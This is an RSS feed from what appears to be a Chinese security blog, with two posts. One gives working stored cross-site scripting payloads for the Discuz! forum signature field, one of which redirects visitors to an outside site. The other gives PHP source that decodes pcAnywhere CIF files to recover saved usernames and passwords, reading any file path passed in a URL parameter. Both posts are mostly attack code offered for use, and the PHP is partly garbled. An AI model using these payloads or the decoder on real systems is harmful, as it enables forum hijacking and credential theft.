<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>Security Team Blog &#187; 黑白网络</title>
	<atom:link href="http://www.secblog.cn/category/hacker/feed" rel="self" type="application/rss+xml" />
	<link>http://www.secblog.cn</link>
	<description>服务器系统架构、优化及网络安全</description>
	<lastBuildDate>Tue, 29 Nov 2011 02:15:12 +0000</lastBuildDate>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=3.2.1</generator>
		<item>
		<title>Discuz!个性签名跨站漏洞</title>
		<link>http://www.secblog.cn/hacker/685.html</link>
		<comments>http://www.secblog.cn/hacker/685.html#comments</comments>
		<pubDate>Wed, 04 Aug 2010 07:04:49 +0000</pubDate>
		<dc:creator>豬頭濱</dc:creator>
				<category><![CDATA[黑白网络]]></category>

		<guid isPermaLink="false">http://www.secblog.cn/hacker/685.html</guid>
		<description><![CDATA[国内很多论坛都用的Discuz!    大家对dz的研究更多了Discuz! 个人中心里的“个人签名”没有对恶意代码进行检测，在 Discuz! 及 img 代码禁用的情况下仍可写入恶意代码，Discuz! 会保存并执行该代码，形成永久型跨站。该漏洞可能导致蠕虫病毒的传播。 虽便选个 Discuz! 论坛我们注册一个用户! 并输入跨站脚本代码 ， 以我们个人的签名！ 代码： &#60;/textarea&#62;&#60;script&#62;alert(/stuhack/);&#60;/script&#62;&#60;textarea&#62; 也可以写成这样:&#60;/textarea&#62;&#60;script&#62;alert(/注册成功/);location.href=/http://www.stuhack.com/;&#60;/script&#62;&#60;textarea&#62;]]></description>
			<content:encoded><![CDATA[<p><a href="http://www.secblog.cn/wp-content/uploads/2010/08/未命名.jpg"><img class="alignnone size-full wp-image-686" title="未命名" src="http://www.secblog.cn/wp-content/uploads/2010/08/未命名.jpg" alt="" width="378" height="202" /></a></p>
<p>国内很多论坛都用的Discuz!     大家对dz的研究更多了Discuz! 个人中心里的“个人签名”没有对恶意代码进行检测，在 Discuz! 及 img  代码禁用的情况下仍可写入恶意代码，Discuz! 会保存并执行该代码，形成永久型跨站。该漏洞可能导致蠕虫病毒的传播。</p>
<p><strong><span style="color: #000000;">虽便选个 Discuz! 论坛我们注册一个用户!<br />
并输入跨站脚本代码 ， 以我们个人的签名！<br />
代码：<br />
&lt;/textarea&gt;&lt;script&gt;alert(/stuhack/);&lt;/script&gt;&lt;textarea&gt;<br />
也可以写成这样:&lt;/textarea&gt;&lt;script&gt;alert(/注册成功/);location.href=/http://www.stuhack.com/;&lt;/script&gt;&lt;textarea&gt;</span></strong></p>
]]></content:encoded>
			<wfw:commentRss>http://www.secblog.cn/hacker/685.html/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>PcAnywhere在线解密源码</title>
		<link>http://www.secblog.cn/hacker/420.html</link>
		<comments>http://www.secblog.cn/hacker/420.html#comments</comments>
		<pubDate>Fri, 30 Jul 2010 03:34:27 +0000</pubDate>
		<dc:creator>豬頭濱</dc:creator>
				<category><![CDATA[黑白网络]]></category>

		<guid isPermaLink="false">http://www.secblog.cn/?p=420</guid>
		<description><![CDATA[&#60;?php * &#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;- */ * PcAnywhere CIF Decode * QQ:7259561 MSN:cnse8@msn.com * Blog:http://1v1.name * &#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;- */ rror_reporting(7); unction PcAnywhere($data, $mode) { $Pass=substr($data, 2); $str =0; if ($mode == “Pass”)$number=32; if ($mode == “User”)$number=64; for ($i=0; $i &#60; $number; $i+=2){ if ($mode == “Pass”)$Cifnum=($str + 144); if ($mode == “User”)$Cifnum=($str + 15); $PassWord=((Hexdec(substr($data, $i, 2)) ^ [...]]]></description>
			<content:encoded><![CDATA[<p>&lt;?php<br />
* &#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;- */<br />
* PcAnywhere CIF Decode<br />
* QQ:7259561 MSN:cnse8@msn.com<br />
* Blog:http://1v1.name<br />
* &#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;- */<br />
rror_reporting(7);<br />
unction PcAnywhere($data, $mode)<br />
{<br />
$Pass=substr($data, 2);<br />
$str =0;<br />
if ($mode == “Pass”)$number=32;<br />
if ($mode == “User”)$number=64;<br />
for ($i=0; $i &lt; $number; $i+=2){<br />
if ($mode == “Pass”)$Cifnum=($str + 144);<br />
if ($mode == “User”)$Cifnum=($str + 15);<br />
$PassWord=((Hexdec(substr($data, $i, 2)) ^ Hexdec(substr($Pass, $i,  2))) ^ $Cifnum);<br />
if (($PassWord &lt;= 32) or ($PassWord &gt; 127))break;<br />
$Num.=chr($PassWord);<br />
$str++;}<br />
return $Num;<br />
}<br />
$path=$_GET['path'];<br />
//”C:\Documents and Settings\All Users\Application  Data\Symantec\PcAnywhere\PCA.1v1.name.CIF”<br />
$path=str_replace(“<a>\\\\”,”\\”,$path</a>);<br />
$str <a href="mailto:=@file_get_contents%28$path">=@file_get_contents($path</a>);<br />
$binstr = bin2hex ($str);<br />
echo “Path:”.$path.”&lt;br&gt;”;<br />
echo “User:”. PcAnywhere(substr($binstr,918,64), User).”&lt;br&gt;”;<br />
echo “Pass:”. PcAnywhere(substr($binstr,1176,32), Pass).”&lt;br&gt;”;<br />
?&gt;</p>
<p>在线演示:http://tools88.com/safe/online_pcAnywhere.php</p>
<p><img src="../images/smiles/sweat.gif" border="0" alt="" /></p>
]]></content:encoded>
			<wfw:commentRss>http://www.secblog.cn/hacker/420.html/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
	</channel>
</rss>

